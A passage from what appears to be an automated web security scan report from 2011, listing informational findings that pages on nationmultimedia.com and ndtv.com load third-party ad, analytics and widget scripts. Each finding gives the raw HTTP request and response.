_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 3139

<script type='text/javascript'>
<!--
var OA_zones = {'Nationmultimedia1431' :1431,'Nationmultimedia1432' :1432,'Nationmultimedia1433' :1433,'Nationmultimedia1434' :1434}
--></script>
<script type='text/javascript' src='http://unitus.synergy-e.com/www/delivery/spcjs.php?id=82'></script>
...[SNIP]...

22.96. http://www.nationmultimedia.com/home/banner/index_a13.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /home/banner/index_a13.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /home/banner/index_a13.html HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose=1; _cbclose32539=1; _uid32539=8467E527.1; _ctout32539=1; verify=test; _em_vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; _em_v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180; _em_hl=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:26:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 02 Jul 2010 10:14:47 GMT
ETag: "a0c6e7-414-db45f3c0"
Accept-Ranges: bytes
_ontent-Length: 1044
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 1044

<!-- banner 125x200 -->
<script language='JavaScript' type='text/javascript' src='http://ads.nationchannel.com/adserverchannel/adx.js'></script>
<script language='JavaScript' type='text/javascript'>
...[SNIP]...

22.97. http://www.nationmultimedia.com/home/banner/index_a2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /home/banner/index_a2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /home/banner/index_a2.html HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/breakingnews/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose32539=1; _uid32539=8467E527.1; verify=test; __utma=113213211.1779481420.1315103161.1315103161.1315103161.1; __utmb=113213211.1.10.1315103165; __utmc=113213211; __utmz=113213211.1315103165.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _pk_ref..5669=%5B%22%22%2C%22%22%2C1315103167%2C%22http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%22%5D; _pk_id..5669=a4f1af5acb69be64.1315103167.1.1315103167.1315103167.; _pk_ses..5669=*; _cbclose=1; _ctout32539=1; _em_hl=1; _em_vt=ee11f5b4b737c3323629b9e202024e62e18088e413-981323754e62e1f6; _em_v=1fc94de23a9888bf29e50d7277324e62e18088e4f8-084548474e62e1f6

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:55:08 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 05 Apr 2011 04:53:51 GMT
ETag: "e8d828-24e-a99195c0"
Accept-Ranges: bytes
_ontent-Length: 590
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 590

<script type='text/javascript'>
<!--
var OA_zones = {'Nationmultimedia874' :874}
--></script>
<script type='text/javascript' src='http://unitus.synergy-e.com/www/delivery/spcjs.php?id=63'></script>
...[SNIP]...

22.98. http://www.nationmultimedia.com/home/banner/index_b2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /home/banner/index_b2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /home/banner/index_b2.html HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/breakingnews/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose32539=1; _uid32539=8467E527.1; verify=test; __utma=113213211.1779481420.1315103161.1315103161.1315103161.1; __utmb=113213211.1.10.1315103165; __utmc=113213211; __utmz=113213211.1315103165.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _pk_ref..5669=%5B%22%22%2C%22%22%2C1315103167%2C%22http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%22%5D; _pk_id..5669=a4f1af5acb69be64.1315103167.1.1315103167.1315103167.; _pk_ses..5669=*; _cbclose=1; _ctout32539=1; _em_hl=1; _em_vt=ee11f5b4b737c3323629b9e202024e62e18088e413-981323754e62e1f6; _em_v=1fc94de23a9888bf29e50d7277324e62e18088e4f8-084548474e62e1f6

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:55:25 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 20 Sep 2010 11:14:05 GMT
ETag: "e8d81d-907-2a6b940"
Accept-Ranges: bytes
_ontent-Length: 2311
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 2311

<script type='text/javascript'>
<!--
var OA_zones = {'Nationmultimedia1441' :1441,'Nationmultimedia1442' :1442,'Nationmultimedia1443' :1443,'Nationmultimedia1444' :1444,'Nationmultimedia1445' :14
...[SNIP]...
</script>
<script type='text/javascript' src='http://unitus.synergy-e.com/www/delivery/spcjs.php?id=82'></script>
...[SNIP]...

22.99. http://www.nationmultimedia.com/home/banner/index_b5.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /home/banner/index_b5.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /home/banner/index_b5.html HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/breakingnews/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose32539=1; _uid32539=8467E527.1; verify=test; __utma=113213211.1779481420.1315103161.1315103161.1315103161.1; __utmb=113213211.1.10.1315103165; __utmc=113213211; __utmz=113213211.1315103165.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _pk_ref..5669=%5B%22%22%2C%22%22%2C1315103167%2C%22http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%22%5D; _pk_id..5669=a4f1af5acb69be64.1315103167.1.1315103167.1315103167.; _pk_ses..5669=*; _cbclose=1; _ctout32539=1; _em_hl=1; _em_vt=ee11f5b4b737c3323629b9e202024e62e18088e413-981323754e62e1f6; _em_v=1fc94de23a9888bf29e50d7277324e62e18088e4f8-084548474e62e1f6

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:55:56 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 11 Oct 2010 10:50:24 GMT
ETag: "5594d4-83a-209edc00"
Accept-Ranges: bytes
_ontent-Length: 2106
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 2106

<!-- Emirate 300x250 All section -->

<!--<script language='JavaScript' type='text/javascript' src='http://ads.nationchannel.com/adserverchannel/adx.js'></script>
<script language='JavaScript' type
...[SNIP]...
<!-- Thai Visa 300x250 -->
<script language='JavaScript' type='text/javascript' src='http://ads.nationchannel.com/adserverchannel/adx.js'></script>
...[SNIP]...

22.100. http://www.nationmultimedia.com/home/banner/section/Breakingnews/300x250Breakingnews.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /home/banner/section/Breakingnews/300x250Breakingnews.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /home/banner/section/Breakingnews/300x250Breakingnews.html HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/Music-to-calm-the-savage-diplomatic-beast-US-band--30164372.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: verify=test; PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose32539=1; _uid32539=8467E527.1; verify=test; _pk_ref..5669=%5B%22%22%2C%22%22%2C1315103167%2C%22http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%22%5D; __utma=113213211.1779481420.1315103161.1315103161.1315103161.1; __utmb=113213211.2.10.1315103165; __utmc=113213211; __utmz=113213211.1315103165.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _pk_id..5669=a4f1af5acb69be64.1315103167.1.1315103271.1315103167.; _pk_ses..5669=*; _cbclose=1; _ctout32539=1; _em_hl=1; _em_vt=ad466b7502917b9a0779b9e202024e62e18088e413-981323754e62e3b1; _em_v=92bdaf4699a374697e850d7277324e62e18088e4f8-084548474e62e3b1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:47:27 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 21 Oct 2010 09:06:20 GMT
ETag: "5594e6-255-d6dcbb00"
Accept-Ranges: bytes
_ontent-Length: 597
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 597

<script type='text/javascript'>
<!--
var OA_zones = {'Nationmultimedia876' :876}
--></script>
<script type='text/javascript' src='http://unitus.synergy-e.com/www/delivery/spcjs.php?id=63'></script>
...[SNIP]...

22.101. http://www.nationmultimedia.com/home/nt-widget/ann-feed.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /home/nt-widget/ann-feed.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /home/nt-widget/ann-feed.html HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose=1; _cbclose32539=1; _uid32539=8467E527.1; _ctout32539=1; verify=test; _em_vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; _em_v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180; _em_hl=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:26:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 19 May 2011 09:46:15 GMT
ETag: "3bf822-607-e04a47c0"
Accept-Ranges: bytes
_ontent-Length: 1543
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 1543

<style type="text/css">
<!--
body {
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 0px;
   margin-bottom: 0px;
}
-->
</style><table width="375" height="289" border="0" style="background:ur
...[SNIP]...
</script>
<script type="text/javascript" src="http://feed.mikle.com/js/rssmikle.js"></script>
...[SNIP]...

22.102. http://www.nationmultimedia.com/national/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /national/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /national/ HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/breakingnews/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose32539=1; _uid32539=8467E527.1; verify=test; _pk_ref..5669=%5B%22%22%2C%22%22%2C1315103167%2C%22http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%22%5D; _cbclose=1; _ctout32539=1; _em_hl=1; _em_vt=ee11f5b4b737c3323629b9e202024e62e18088e413-981323754e62e1f6; _em_v=1fc94de23a9888bf29e50d7277324e62e18088e4f8-084548474e62e1f6; __utma=113213211.1779481420.1315103161.1315103161.1315103161.1; __utmb=113213211.2.10.1315103165; __utmc=113213211; __utmz=113213211.1315103165.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _pk_id..5669=a4f1af5acb69be64.1315103167.1.1315103271.1315103167.; _pk_ses..5669=*

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:39:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 37601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script type='text/javascript' src='http://unitus.synergy-e.com/www/delivery/spcjs.php?id=63'></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002761.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

22.103. http://www.nationmultimedia.com/specials/nationphoto/show.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /specials/nationphoto/show.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /specials/nationphoto/show.php HTTP/1.1
Host: www.nationmultimedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:41:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Thailand pictures , news in pictures , photo in Thail
...[SNIP]...
</script>
<script type='text/javascript' src='http://unitus.synergy-e.com/www/delivery/spcjs.php?id=63'></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002761.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b9e02a022a86075"></script>
...[SNIP]...

22.104. http://www.nationmultimedia.com/specials/nationvdo/showvdo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /specials/nationvdo/showvdo.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /specials/nationvdo/showvdo.php HTTP/1.1
Host: www.nationmultimedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:41:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002761.js"></script>
...[SNIP]...
<td>
<script src="http://www.gmodules.com/ig/ifr?url=http://www.google.com/ig/modules/youtube.xml&amp;up_channel=Thailandevents&amp;synd=open&amp;w=260&amp;h=365&amp;title=&amp;border=%23ffffff%7C3px%2C1px+solid+%23999999&amp;output=js"></script>
...[SNIP]...
<!-- By use of this code snippet, I agree to the Brightcove Publisher T and C found at https://accounts.brightcove.com/en/terms-and-conditions/. --> <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

22.105. http://www.ndtv.com/article/cities/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /article/cities/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/cities/mumbai-airports-main-runway-shut-till-8-am-flights-delayed-131003 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=549
Expires: Sun, 04 Sep 2011 04:51:31 GMT
Date: Sun, 04 Sep 2011 04:42:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71613

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.106. http://www.ndtv.com/article/cities/mumbai-airports-main-runway-still-shut-flights-delayed-131003  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /article/cities/mumbai-airports-main-runway-still-shut-flights-delayed-131003

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/cities/mumbai-airports-main-runway-still-shut-flights-delayed-131003 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=50
Expires: Sun, 04 Sep 2011 04:43:15 GMT
Date: Sun, 04 Sep 2011 04:42:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71609

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.107. http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news#sclient=psy&hl=en&source=hp&q=mumbay+news&pbx=1&oq=mumbay+news&aq=f&aqi=g-c5&aql=&gs_sm=e&gs_upl=32342l36076l0l37100l8l7l1l0l0l4l1052l4032l3-1.1.1.2.1l6l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 69784
Cache-Control: max-age=32
Expires: Sun, 04 Sep 2011 02:32:44 GMT
Date: Sun, 04 Sep 2011 02:32:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.108. http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917 HTTP/1.1
Host: www.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAS_SC1=1315103177650; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.2.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=wijp1ux6nq7l2qhl

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 68778
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 03:36:28 GMT
Date: Sun, 04 Sep 2011 03:26:28 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.109. http://www.ndtv.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=878
Expires: Sun, 04 Sep 2011 04:58:18 GMT
Date: Sun, 04 Sep 2011 04:43:40 GMT
Content-Length: 28170
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
<!-- search ends -->
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...

22.110. http://www.ndtv.com/trends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /trends

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /trends HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=557
Expires: Sun, 04 Sep 2011 04:52:50 GMT
Date: Sun, 04 Sep 2011 04:43:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 282966

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
<script language="JavaScript" src="http://d2.zedo.com/jsc/d2/fo.js"></script>
...[SNIP]...
</script>
